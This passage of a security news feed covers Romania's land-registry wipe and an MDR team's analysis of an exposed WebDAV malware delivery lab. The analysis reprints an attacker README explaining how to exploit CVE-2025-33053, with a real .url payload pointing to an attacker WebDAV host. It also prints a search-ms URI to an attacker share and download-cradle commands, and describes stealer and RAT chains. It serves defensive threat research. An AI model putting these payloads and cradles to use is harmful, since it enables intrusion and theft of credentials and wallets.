Eigentumsnachweise und Details aus den Grundakten nicht abrufbar sind. Laut Behörden wird parallel an einer vollständigen Neuaufsetzung der IT-Infrastruktur gearbeitet. […]</p>
<div><a href="https://www.it-boltwise.de/bytetobreach-loescht-rumaenisches-grundbuch-immobilienhandel-steht-still.html">... den vollständigen Artikel <strong>»ByteToBreach löscht rumänisches Grundbuch – Immobilienhandel steht still«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/bytetobreach-loescht-rumaenisches-grundbuch-immobilienhandel-steht-still.html">ByteToBreach löscht rumänisches Grundbuch – Immobilienhandel steht still</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hacker Wipes Romania's Entire Land Registry Database]]></title>
<description><![CDATA[A hacker reportedly wiped Romania's entire land registry database after a failed extortion attempt, halting property transactions across the country and preventing notaries from issuing land extracts, authenticating sales, or registering mortgages. "On the dark web, the hacker also boasted to hav...]]></description>
<link>https://tsecurity.de/de/3681830/it-security-nachrichten/hacker-wipes-romanias-entire-land-registry-database/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681830/it-security-nachrichten/hacker-wipes-romanias-entire-land-registry-database/</guid>
<pubDate>Mon, 20 Jul 2026 19:23:29 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A hacker reportedly wiped Romania's entire land registry database after a failed extortion attempt, halting property transactions across the country and preventing notaries from issuing land extracts, authenticating sales, or registering mortgages. "On the dark web, the hacker also boasted to have begun backup copies of stolen data in an attempt to prevent it from being restored," reports Cybernews. "However, Romanian officials have managed to at least restore the ANCPI's website and post a message saying they were rebuilding the agency's entire network from scratch. It appears that the agency has an offline copy of the wiped data." From the report: First, the hacker breached Romania's cadastre agency, the National Agency for Cadastre and Real Estate Advertising (ANCPI), posting on a hacking forum: "[RO] Thy arss shall be spanked, Romania! [ANCPI]." "In addition to the data of Romanian citizens, from various databases collected through ANCPI networks, there is also a copy of the GitLab servers containing the source code of all their systems, such as Eterra, RENNS, as well as a version of my little ransomware program," the announcement continued.
 
"The official government website announced a shutdown of IT systems due to 'technical problems,' but this is a bit of an understatement. An offer of assistance was made, but without insistence or pressure." Indeed, the ANCPI initially claimed technical issues but had to admit it was facing a cyberattack. Today, no one can really access the institution's systems. And since the extortion didn't work, the hacker -- who seems to have entered the database using valid credentials -- deleted all data they had stolen, including internal documents, employee credentials, and, of course, land registry data.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Hacker+Wipes+Romania's+Entire+Land+Registry+Database%3A+https%3A%2F%2Fit.slashdot.org%2Fstory%2F26%2F07%2F20%2F172249%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fit.slashdot.org%2Fstory%2F26%2F07%2F20%2F172249%2Fhacker-wipes-romanias-entire-land-registry-database%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://it.slashdot.org/story/26/07/20/172249/hacker-wipes-romanias-entire-land-registry-database?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[From a Single Alert to 1,000 Files: Inside an Exposed WebDAV Malware Delivery Lab]]></title>
<description><![CDATA[Executive summaryAn MDR alert recently led our team to an exposed server that was doing more than hosting payloads. It was functioning as a fully operational malware delivery lab. Containing over 1,000 artifacts, the infrastructure served as a QA hub where attackers systematically tested delivery...]]></description>
<link>https://tsecurity.de/de/3681303/it-security-nachrichten/from-a-single-alert-to-1000-files-inside-an-exposed-webdav-malware-delivery-lab/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681303/it-security-nachrichten/from-a-single-alert-to-1000-files-inside-an-exposed-webdav-malware-delivery-lab/</guid>
<pubDate>Mon, 20 Jul 2026 15:53:12 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>Executive summary</h2><p><span>An MDR alert recently led our team to an exposed server that was doing more than hosting payloads. It was functioning as a fully operational malware delivery lab. Containing over 1,000 artifacts, the infrastructure served as a QA hub where attackers systematically tested delivery paths, social engineering lures, and WebDAV execution methods.</span></p><p><span>Our analysis reveals an interesting shift in adversary operations: attackers are adopting generative AI to move beyond individual exploits and operate like modern software product teams. By leveraging LLMs for rapid lure generation, detailed README documentation, and automated testing, they are significantly accelerating their development cycle.</span></p><p><span>This incident underscores the imperative of preemptive security. By unifying exposure management with detection and response, we did not just catch a single campaign; we gained visibility into the attacker’s entire delivery pipeline. Although the server hosted many malware samples, the more interesting find was the view into the attacker’s workflow. The exposed infrastructure showed how the operator tested delivery paths, packaged lures, staged payloads, and monitored delivery activity. All of it with the help of generative AI.</span></p><h2>Introduction: From MDR alert to attacker infrastructure</h2><p><span>The investigation started with an MDR alert after a user executed a file pulled from a WebDAV server using </span><span><span data-type="inlineCode">rundll32.exe</span></span><span>. Telemetry showed the WebClient service starting, followed by </span><span><span data-type="inlineCode">davclnt.dll</span></span><span> reaching out to a remote host to retrieve content.</span></p><p><span>That initial hit led us to dig deeper into the delivery setup, which is how we ended up finding an exposed directory. It quickly became clear to us that the server wasn't just hosting files, but also was used as an active malware testing and delivery hub. Alongside payloads, we found bulk-generated shortcut lures, URL-based execution tests, ClickFix pages, WebDAV initialization scripts, droppers, spoofed filenames, and operator notes.</span></p><p><span>At a high level, the 1,048 files clustered as follows:</span></p><p><span></span></p><table><colgroup data-width="1566"><col><col><col></colgroup><tbody><tr><td><p><span><strong>Category</strong></span></p></td><td><p><span><strong>Files</strong></span></p></td><td><p><span><strong>Functions and discoveries</strong></span></p></td></tr><tr><td><p><span>LNK delivery launchers</span></p></td><td><p><span>453</span></p></td><td><p><span>Bulk-generated shortcut lures using document themes, spoofed filenames, fake icons, and multiple execution paths</span></p></td></tr><tr><td><p><span>Filename-spoofing QA</span></p></td><td><p><span>236</span></p></td><td><p><span>Tests for Unicode, double-extension, padding, and browser/Explorer rendering behavior</span></p></td></tr><tr><td><p><span>URL/LOLBin execution tests</span></p></td><td><p><span>146</span></p></td><td><p><span>Experiments with signed Windows binaries, remote working directories, and WebDAV-style execution</span></p></td></tr><tr><td><p><span>Encrypted droppers</span></p></td><td><p><span>89</span></p></td><td><p><span>Staged second-stage payloads and installer-style packages</span></p></td></tr><tr><td><p><span>Alternative execution containers</span></p></td><td><p><span>24</span></p></td><td><p><span><span data-type="inlineCode">search-ms</span></span><span>, </span><span><span data-type="inlineCode">library-ms</span></span><span>, </span><span><span data-type="inlineCode">.cpl</span></span><span>, and related delivery containers</span></p></td></tr><tr><td><p><span>Payload stubs and spoofed executables</span></p></td><td><p><span>21</span></p></td><td><p><span>Smaller loaders, decoys, and renamed binaries</span></p></td></tr><tr><td><p><span>WebDAV scripts</span></p></td><td><p><span>17</span></p></td><td><p><span>Scripts intended to make WebDAV delivery more reliable on Windows systems</span></p></td></tr><tr><td><p><span>Builder and operator notes</span></p></td><td><p><span>10</span></p></td><td><p><span><span data-type="inlineCode">README</span></span><span> files, test reports, mappings, and generation scripts</span></p></td></tr><tr><td><p><span>ClickFix HTML lures</span></p></td><td><p><span>9</span></p></td><td><p><span>Browser-based social-engineering pages instructing users to run commands</span></p></td></tr><tr><td><p><span>Miscellaneous files</span></p></td><td><p><span>6</span></p></td><td><p><span>Included documentation for the actor’s WebDAV delivery/admin panel</span></p></td></tr></tbody></table><p><span><em>Table 1: Breakdown of files recovered from the attacker’s delivery workspace</em></span></p><h2><span>Technical analysis and observed attacker behavior</span></h2><h3>Attackers testing like a product team</h3><p><span>The open directory exposed the attacker’s payloads and testing process. The collection varied by function: some folders stored payloads, while others isolated individual delivery methods, including WebDAV, UNC paths, </span><span><span data-type="inlineCode">search-ms</span></span><span>, </span><span><span data-type="inlineCode">library-ms</span></span><span>, Control Panel items, and trusted Windows binaries. Several directories appeared to be QA areas for testing how lures are rendered in browsers and Windows Explorer. These tests included Unicode spoofing, right-to-left override (RTLO) characters, double extensions, and padding tricks used to make executables look like documents.</span></p><p><span>The directory also contained several README files. Their structure and phrasing suggested they may have been generated with LLMs. Some folders were named </span><span><span data-type="inlineCode">testik</span></span><span> and </span><span><span data-type="inlineCode">testik2</span></span><span>, a Russian diminutive form of “test”.</span></p><p><span></span></p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltbc6d4a9f8e6c1e40/6a5e1283f480d89435286a73/testing-files-subfolders.png" alt="testing-files-subfolders.png" caption="Figure 1: Snippet of one of many subfolders containing testing files." class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="testing-files-subfolders.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltbc6d4a9f8e6c1e40/6a5e1283f480d89435286a73/testing-files-subfolders.png" data-sys-asset-uid="bltbc6d4a9f8e6c1e40" data-sys-asset-filename="testing-files-subfolders.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 1: Snippet of one of many subfolders containing testing files." data-sys-asset-alt="testing-files-subfolders.png" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 1: Snippet of one of many subfolders containing testing files.</figcaption></div></figure><p>⠀</p><p><span>Looking at the artifacts from the open directory, we saw that the attacker was testing some specific CVEs.</span></p><p><span></span></p><table><colgroup data-width="1901"><col><col><col></colgroup><tbody><tr><td><p><span><strong>CVE</strong></span></p></td><td><p><span><strong>Observed samples</strong></span></p></td><td><p><span><strong>Short description</strong></span></p></td></tr><tr><td><p><span>CVE-2025-33053</span></p></td><td><p><span>11</span></p></td><td><p><span>Windows Internet Shortcut flaw involving external control of a file name or path, allowing code execution over a network. (</span><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-33053?utm_source=chatgpt.com" target="_blank"><span>nvd.nist.gov</span></a><span>)</span></p></td></tr><tr><td><p><span>CVE-2026-21513</span></p></td><td><p><span>4</span></p></td><td><p><span>MSHTML Framework security feature bypass caused by protection-mechanism failure. (</span><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-21513?utm_source=chatgpt.com" target="_blank"><span>nvd.nist.gov</span></a><span>)</span></p></td></tr><tr><td><p><span>CVE-2025-24054</span></p></td><td><p><span>1</span></p></td><td><p><span>Windows NTLM spoofing issue where crafted file/path handling can trigger outbound authentication and leak NTLM material; observed tradecraft commonly involved </span><span><span data-type="inlineCode">.library-ms</span></span><span> files. (</span><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-24054?utm_source=chatgpt.com" target="_blank"><span>nvd.nist.gov</span></a><span>)</span></p></td></tr></tbody></table><p><span><em>Table 2: CVE references observed in the exposed directory.</em></span></p><p></p><p><span>The most developed test set focused on </span><span>CVE-2025-33053,</span><span> the working-directory abuse technique reported by Check Point in its analysis of Stealth Falcon activity. It appears as though the threat was trying to reproduce or adapt the reported technique with the help from README that appears to have been generated with LLMs. At a high level, the technique abuses </span><span><span data-type="inlineCode">.url</span></span><span> shortcut behavior to launch a legitimate signed Windows binary while setting its working directory to an attacker-controlled WebDAV share. In the original reporting, the binary was </span><span><span data-type="inlineCode">iediagcmd.exe</span></span><span>, an Internet Explorer diagnostics utility. When invoked, that utility launches several child processes by name. If the working directory points to a remote WebDAV location controlled by the attacker, Windows may resolve those child process names from the remote share instead of the expected local system directory.</span></p><p><span>The README files closely mirrored this logic. They called out </span><span><span data-type="inlineCode">iediagcmd.exe</span></span><span> as the preferred binary, referenced the same WebDAV working-directory pattern described in the Stealth Falcon reporting, and preserved the previously reported </span><span><span data-type="inlineCode">summerartcamp.net@ssl@443\DavWWWRoot\OSYxaOjr</span></span><span> path as an example. So if you ever wonder who reads your blogs, it seems like attackers do.</span></p><p></p><pre language="c">CVE-2025-33053 (Stealth Falcon APT) - Test Setup
=====================================================

WHAT IS THIS?
This .url file abuses iediagcmd.exe to execute a file from WebDAV
WITHOUT any security warnings. Zero alerts!

HOW IT WORKS:
1. .url file contains URL=path to iediagcmd.exe (legitimate IE tool)
2. .url sets WorkingDirectory to WebDAV share
3. When clicked: iediagcmd.exe starts with cwd = WebDAV
4. iediagcmd internally calls: route.exe, ipconfig.exe, netsh.exe, ping.exe
5. Process.Start() searches in working directory FIRST
6. WebClient auto-starts when accessing WebDAV
7. Attacker's route.exe (renamed putty.exe) runs from WebDAV
8. NO SmartScreen, NO MoTW warnings!

REQUIREMENTS TO MAKE TEST WORK:
================================

1. iediagcmd.exe MUST exist on victim machine
   Path: C:\Program Files\Internet Explorer\iediagcmd.exe
   - Win10 (1607-22H2):        YES
   - Win11 21H2/22H2/23H2:     usually YES
   - Win11 24H2 (IE removed):  NO (this is why your F-series failed!)
   - Check on victim:
     dir "C:\Program Files\Internet Explorer\iediagcmd.exe"

2. WebDAV MUST have file named EXACTLY "route.exe"
   NOT putty.exe! iediagcmd will only execute these names:
   - route.exe
   - ipconfig.exe
   - netsh.exe
   - ping.exe
   On your WebDAV server, RENAME putty.exe to route.exe
   Place at: \\TA_C2\Downloads\route.exe

3. Microsoft patch from June 2025 MUST NOT be installed
   Check: Get-HotFix | Where-Object {$_.HotFixID -match "KB5060"}
   If patched, exploit fails.

ALTERNATIVE LOLBINS (if iediagcmd.exe missing):
================================================
F4_CustomShellHost_explorer.url - uses CustomShellHost.exe
   (mentioned in CheckPoint report - spawns explorer.exe)
F5_OfficeC2RClient_alternative.url - uses Office C2R client
   (if Office is installed)

REAL ATTACK PAYLOAD WAS:
[InternetShortcut]
URL=C:\Program Files\Internet Explorer\iediagcmd.exe
WorkingDirectory=\\summerartcamp.net@ssl@443\DavWWWRoot\OSYxaOjr
ShowCommand=7
IconIndex=13
IconFile=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Modified=20F06BA06D07BD014D</pre><p language="html"><span><em>Figure 2: Contents of README, likely generated by LLM, found in the exposed directory.</em></span><em><br></em>⠀</p><p><span>The testing approach was methodical and included the below:</span></p><p><span><strong>Transports</strong></span><span>: WebDAV over </span><span><span data-type="inlineCode">@80</span></span><span> and </span><span><span data-type="inlineCode">@ssl@443</span></span></p><p><span><strong>Path formats</strong></span><span>: </span><span><span data-type="inlineCode">DavWWWRoot</span></span><span> vs. plain UNC</span></p><p><span><strong>Fallback LOLBins</strong></span><span>: </span><span><span data-type="inlineCode">CustomShellHost.exe</span></span><span>, </span><span><span data-type="inlineCode">OfficeC2RClient.exe</span></span><span>, and many more for hosts where </span><span><span data-type="inlineCode">iediagcmd.exe</span></span><span> is absent</span></p><p><span><strong>Download cradles</strong></span><span>: </span><span><span data-type="inlineCode">bitsadmin /transfer</span></span><span>, </span><span><span data-type="inlineCode">certutil -urlcache -split -f</span></span><span>, </span><span><span data-type="inlineCode">mshta http(s)://…</span></span></p><p><span><strong>Shortcut launchers</strong></span><span>: PowerShell </span><span><span data-type="inlineCode">IEX (New-Object Net.WebClient).DownloadString(...)</span></span><span>, hidden/minimized windows</span></p><p><span><strong>Explorer containers</strong></span><span>: </span><span><span data-type="inlineCode">search-ms:</span></span><span> queries and </span><span><span data-type="inlineCode">.library-ms</span></span><span> files exposing remote payloads</span></p><p><span><strong>ClickFix pages</strong></span><span>: relying on user copy/paste execution</span></p><p><span><strong>Filename spoofing</strong></span><span>: RTLO (U+202E), double extensions, and whitespace padding before </span><span><span data-type="inlineCode">.exe</span></span><span> / </span><span><span data-type="inlineCode">.scr</span></span></p><h2>The lure factory</h2><p><span>The lure themes were broad and familiar: invoices, privacy policies, contracts, signed documents, finance reports, Labcorp-themed reports, salary statements, and notification policies.</span></p><p><span>Judging by the lure themes, we concluded that the attacker is targeting enterprise Windows users who are likely to open routine documents.</span></p><p><span>The threat actor also invested heavily in making files look “safe”. Many lure names mimicked PDFs or office documents. Others used fake icons associated with common software. Some attempted to hide arguments or launch windows minimized. Clearly, the goal was to make malicious execution feel like ordinary document handling.</span></p><p><span>The directory also contained ClickFix HTML lures. These pages mimicked familiar services, application errors, and document-access workflows to convince users to copy and run a command. The lures were disguised as Cloudflare verification checks, Adobe or Word document errors, Microsoft login pages, Chrome update messages, and Discord-themed notices. Filenames such as </span><span><span data-type="inlineCode">Fix_Connection_Error.html</span></span><span>, </span><span><span data-type="inlineCode">Update_Required.html</span></span><span>, </span><span><span data-type="inlineCode">Secure_Document_Access.html</span></span><span>, </span><span><span data-type="inlineCode">Verification_Failed.html</span></span><span>, and </span><span><span data-type="inlineCode">Open_Document_Instructions.html</span></span><span> show how the actor repackaged the same execution pattern under different social-engineering themes.</span></p><p><span>The commands typically launched PowerShell to fetch remote content, used </span><span><span data-type="inlineCode">cmd.exe</span></span><span> to open payloads from WebDAV or UNC paths, or used utilities like </span><span><span data-type="inlineCode">rundll32</span></span><span> and </span><span><span data-type="inlineCode">mshta</span></span><span> to proxy execution. Many referenced attacker-controlled paths, temporary directories, hidden windows, or encoded arguments to reduce visibility.</span></p><h2>The payload chains </h2><p><span>The exposed directory contained many payloads, but we did not reverse every binary in the collection. We initially started with reverse engineering, but after analyzing several chains, we found repeated packaging patterns and suspected that some staged files may have led to the same or closely related final payloads.</span></p><p><span>We therefore shifted from exhaustive reverse engineering to triage. We reviewed several files, including </span><span><span data-type="inlineCode">DlrtyGames</span></span><span>, </span><span><span data-type="inlineCode">CursorSetup</span></span><span>, </span><span><span data-type="inlineCode">ReportFinal.rsc.pdf</span></span><span>, </span><span><span data-type="inlineCode">ReportFina.exe</span></span><span> and </span><span><span data-type="inlineCode">pdfgear_setup_v2.1.16.exe</span></span><span>, and prioritized payloads that either represented distinct delivery approaches or were tied to observed campaign activity.</span></p><p><span>Our main focus became the most commonly delivered file in the most recent CURP campaign, based on artifacts we found in cPanel. This gave us the clearest link between the exposed delivery infrastructure and active campaign activity. </span></p><p><span>This scope is intentional. This post is about the attacker’s delivery workflow, not a full reverse-engineering report for every sample in the directory. We use the payload analysis to show how the operator packaged lures, staged loaders, tested execution methods, and moved from delivery to final payload execution. </span></p><h2><span>Case study 1: CURP campaign targeting Mexico</span></h2><p><span>Our MDR alert began with a user who landed on the phishing site </span><span><span data-type="inlineCode">www[.]gobf[.]mx</span></span><span>, a typosquat impersonating the Mexican government's CURP (Clave Única de Registro de Población) national-ID lookup service at </span><a href="https://www.gob.mx/curp/" target="_blank"><span>https://www.gob.mx/curp/</span></a><span>. The phishing site presented a convincing single-page application that asked victims to enter CURP identity data and retrieve an official record.</span></p><p><em></em></p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltc4d4e8c3f881bba8/6a5e14ba2ee1c1e5373aea06/Phishing-page-impersonating-Mexico%E2%80%99s-CURP-lookup-service.png" alt="Phishing-page-impersonating-Mexico’s-CURP-lookup-service.png" caption="Figure 3: Phishing page impersonating Mexico’s CURP lookup service, with browser developer tools showing the embedded WebDAV delivery logic." class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="Phishing-page-impersonating-Mexico’s-CURP-lookup-service.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltc4d4e8c3f881bba8/6a5e14ba2ee1c1e5373aea06/Phishing-page-impersonating-Mexico’s-CURP-lookup-service.png" data-sys-asset-uid="bltc4d4e8c3f881bba8" data-sys-asset-filename="Phishing-page-impersonating-Mexico’s-CURP-lookup-service.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 3: Phishing page impersonating Mexico’s CURP lookup service, with browser developer tools showing the embedded WebDAV delivery logic." data-sys-asset-alt="Phishing-page-impersonating-Mexico’s-CURP-lookup-service.png" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 3: Phishing page impersonating Mexico’s CURP lookup service, with browser developer tools showing the embedded WebDAV delivery logic.</figcaption></div></figure><p>⠀</p><p><span>The site’s client-side JavaScript handled the fake ID lookup flow and then triggered payload delivery when the victim clicked the download button. Instead of downloading a PDF directly, the script invoked a </span><span><span data-type="inlineCode">search-ms:</span></span><span> URI that opened the operator’s remote WebDAV share as a Windows Explorer search view filtered to </span><span><span data-type="inlineCode">.scr</span></span><span> files:</span></p><p><span></span></p><pre language="c">search-ms:displayname=Search Results in \\onedrive.cv@80\Downloads\CURP
         &amp;query=*.scr
         &amp;crumb=location:\\onedrive.cv@80\Downloads\CURP</pre><p>⠀<br><span>It's worth mentioning that the malicious Javascript with russian comments appears to be also generated with the help of GenAI. As you can see in the screenshot above it contains emojis and comments which are very typical for the LLM models.</span></p><p><span>The exposed Simba Service panel tied this phishing flow back to the attacker’s delivery infrastructure. The </span><span><span data-type="inlineCode">CURP</span></span><span> folder was the most-accessed campaign folder, with 2,384 recorded interactions. The same count appeared for </span><span><span data-type="inlineCode">ReportFinal.rcs.pdf</span></span><span>, making it the clearest link between the phishing site, the WebDAV delivery path, and active campaign activity.</span><br></p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltedc57850fe037c68/6a5e15175e34b039dfdfd8bf/Simba-Service-WebDAV-dashboard-CURP.png" alt="Simba-Service-WebDAV-dashboard-CURP.png" caption="Figure 4: Simba Service WebDAV dashboard showing the exposed delivery workspace, with the CURP folder recorded as the most-accessed campaign folder at 2,384 interactions." class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="Simba-Service-WebDAV-dashboard-CURP.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltedc57850fe037c68/6a5e15175e34b039dfdfd8bf/Simba-Service-WebDAV-dashboard-CURP.png" data-sys-asset-uid="bltedc57850fe037c68" data-sys-asset-filename="Simba-Service-WebDAV-dashboard-CURP.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 4: Simba Service WebDAV dashboard showing the exposed delivery workspace, with the CURP folder recorded as the most-accessed campaign folder at 2,384 interactions." data-sys-asset-alt="Simba-Service-WebDAV-dashboard-CURP.png" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 4: Simba Service WebDAV dashboard showing the exposed delivery workspace, with the CURP folder recorded as the most-accessed campaign folder at 2,384 interactions.</figcaption></div></figure><p>⠀</p><p><span>Although </span><span><span data-type="inlineCode">ReportFinal.rcs.pdf</span></span><span> appeared to be a PDF, it was actually a right-to-left override (RTLO) masqueraded </span><span><span data-type="inlineCode">.scr</span></span><span> executable built with a Delphi/Inno Setup installer. Once executed, it extracted and launched the </span><span><span data-type="inlineCode">Fo-Binary.exe</span></span><span> loader, initiating the multi-stage infection chain.</span></p><p><span></span></p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltf312b78111eb9912/6a5e15916d22612fa5454d67/Execution-chain-PDF-lure.jpg" alt="Execution-chain-PDF-lure.jpg" caption="Figure 5: Execution chain for the ReportFinal.rcs.pdf lure, from RTLO-masqueraded .scr file to in-memory stealer execution and C2 exfiltration." class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="Execution-chain-PDF-lure.jpg" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltf312b78111eb9912/6a5e15916d22612fa5454d67/Execution-chain-PDF-lure.jpg" data-sys-asset-uid="bltf312b78111eb9912" data-sys-asset-filename="Execution-chain-PDF-lure.jpg" data-sys-asset-contenttype="image/jpeg" data-sys-asset-caption="Figure 5: Execution chain for the ReportFinal.rcs.pdf lure, from RTLO-masqueraded .scr file to in-memory stealer execution and C2 exfiltration." data-sys-asset-alt="Execution-chain-PDF-lure.jpg" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 5: Execution chain for the ReportFinal.rcs.pdf lure, from RTLO-masqueraded .scr file to in-memory stealer execution and C2 exfiltration.</figcaption></div></figure><p>⠀</p><p><span>The final payload was an unknown .NET information stealer, operated entirely fileless-ly to evade disk-based detection. The execution sequence followed as such:</span></p><ul><li><span><strong>Decryption:</strong></span><span> The </span><span><span data-type="inlineCode">Fcqleh</span></span><span> loader decrypted the embedded payload using AES and GZip.</span></li><li><p><span><strong>Reflective Loading: </strong></span><span>The loader mapped the payload directly into memory using the </span><span><span data-type="inlineCode">Assembly.Load(byte[])</span></span><span> API.</span></p></li><li><p><span><strong>Process Injection:</strong></span><span> The malicious code was executed inside a legitimate, EV-signed Qihoo 360 process via process hollowing, allowing the malicious code to run under a trusted signed process image.</span></p></li></ul><p><span>The decrypted in-memory configuration exposed the payload’s feature set and version </span><span><span data-type="inlineCode">4.4.3</span></span><span>. It also contained the build tag </span><span><span data-type="inlineCode">06x12x2026SantaEbash2</span></span><span>, which matched toolkit timestamps from June 12, 2026.</span></p><p><span>Once running, the stealer targeted cryptocurrency assets, browser data, messaging sessions, and local application data. Its collection logic included around 20 desktop wallet clients and browser wallet extensions, saved browser usernames, passwords, cookies, session tokens, the Telegram </span><span><span data-type="inlineCode">tdata</span></span><span> session database, Foxmail data, and a screenshot of the victim’s desktop.</span></p><p><span>The payload also included anti-analysis checks. The payload checked for the </span><span><span data-type="inlineCode">COR_PROFILER</span></span><span> environment variable and called </span><span><span data-type="inlineCode">IsDebuggerPresent</span></span><span>. If the malware detected that it was being monitored or debugged, it immediately called </span><span><span data-type="inlineCode">FailFast</span></span><span> to kill the process. The stealer also delayed decrypting its watchlist and collection configuration until after a successful C2 handshake, preventing its full functionality from being revealed in isolated sandboxes. </span></p><p><span>Collected data was exfiltrated to </span><span><span data-type="inlineCode">77[.]110.127.205</span></span><span> (alias </span><span><span data-type="inlineCode">google.services.ug</span></span><span>, certificate </span><span><span data-type="inlineCode">CN=Eglgyqnoa</span></span><span>) over </span><span><span data-type="inlineCode">SslStream</span></span><span> (TLS without SNI) and raw </span><span><span data-type="inlineCode">Socket</span></span><span>.</span><span>The stolen data was sent as a multipart HTTP POST request to </span><span><span data-type="inlineCode">/c2</span></span><span>.</span></p><p><span>Based on the analyzed behavior, the payload functioned as an information stealer focused on credential, wallet, and session theft.</span></p><h2>Case study 2: The "DlrtyGames" sideloading chain</h2><p><span>While the </span><span><span data-type="inlineCode">ReportFinal</span></span><span> lure used an Inno Setup installer to launch a fileless stealer, a second campaign directory on the server, </span><span><span data-type="inlineCode">DlrtyGames</span></span><span>, showed a different delivery architecture. This chain was built to deploy a modular RAT through DLL sideloading, IDAT, process hollowing, and persistence.</span></p><p><span>The </span><span><span data-type="inlineCode">DlrtyGames</span></span><span> chain began with a silent 7-Zip SFX dropper, </span><span><span data-type="inlineCode">DlrtyGames.exe</span></span><span>. It extracted a benign, signed Ubisoft binary, </span><span><span data-type="inlineCode">Volt_Droid.exe</span></span><span>, into the victim’s temporary directory alongside a trojanized dependency, </span><span><span data-type="inlineCode">discord-rpc.x64.dll</span></span><span>. </span></p><p><em></em></p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltf89ec69e4241e5c3/6a5e1707745c95057f3acb23/DlrtyGames-execution-chain.jpg" alt="DlrtyGames-execution-chain.jpg" caption="Figure 6: DlrtyGames execution chain showing the flow from 7-Zip SFX dropper to DLL sideloading, IDAT-based payload loading, process hollowing, and .NET RAT execution." class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="DlrtyGames-execution-chain.jpg" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltf89ec69e4241e5c3/6a5e1707745c95057f3acb23/DlrtyGames-execution-chain.jpg" data-sys-asset-uid="bltf89ec69e4241e5c3" data-sys-asset-filename="DlrtyGames-execution-chain.jpg" data-sys-asset-contenttype="image/jpeg" data-sys-asset-caption="Figure 6: DlrtyGames execution chain showing the flow from 7-Zip SFX dropper to DLL sideloading, IDAT-based payload loading, process hollowing, and .NET RAT execution." data-sys-asset-alt="DlrtyGames-execution-chain.jpg" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 6: DlrtyGames execution chain showing the flow from 7-Zip SFX dropper to DLL sideloading, IDAT-based payload loading, process hollowing, and .NET RAT execution.</figcaption></div></figure><p>⠀</p><p><span><span data-type="inlineCode">Volt_Droid.exe</span></span><span> used DLL sideloading to load </span><span><span data-type="inlineCode">discord-rpc.x64.dll</span></span><span>. This decoded its configuration, resolved APIs by hash, and manually mapped </span><span><span data-type="inlineCode">profiler16.dll</span></span><span>. The mapped </span><span><span data-type="inlineCode">profiler16.dll</span></span><span> stage then read </span><span><span data-type="inlineCode">loader-pool.db</span></span><span>, a PNG file whose encrypted modules were stored across IDAT chunks. After a 45-second sleep delay, it reassembled and decrypted the embedded content, set up persistence, performed COM auto-elevation through </span><span><span data-type="inlineCode">dllhost.exe</span></span><span>, and prepared the final hollowing stage.</span></p><p><span>The final injection stage was handled by an x86 PIC shellcode blob carved from </span><span><span data-type="inlineCode">loader-pool.db</span></span><span> at offset </span><span><span data-type="inlineCode">0xb516a</span></span><span>. That shellcode created signed host processes such as </span><span><span data-type="inlineCode">MegArray.exe</span></span><span> or </span><span><span data-type="inlineCode">Crisp.exe</span></span><span> in a suspended state, unmapped their original image, wrote the payload into the process, updated thread context, and resumed execution. The result was a modular .NET RAT running inside a signed host process.</span></p><p><span>The </span><span><span data-type="inlineCode">DlrtyGames</span></span><span> payload was a modular RAT with plugins for keylogging, screenshots, window monitoring, and C2 communication. Its keylogger module used plaintext keyword triggers for payment, banking, credit, and cryptocurrency activity, including </span><span><span data-type="inlineCode"><em>relaypayments.com</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>plaid</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>fiservapps</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>payoneer</em></span></span><span><em>, </em></span><span><span data-type="inlineCode"><em>google pay</em></span></span><span><em>, 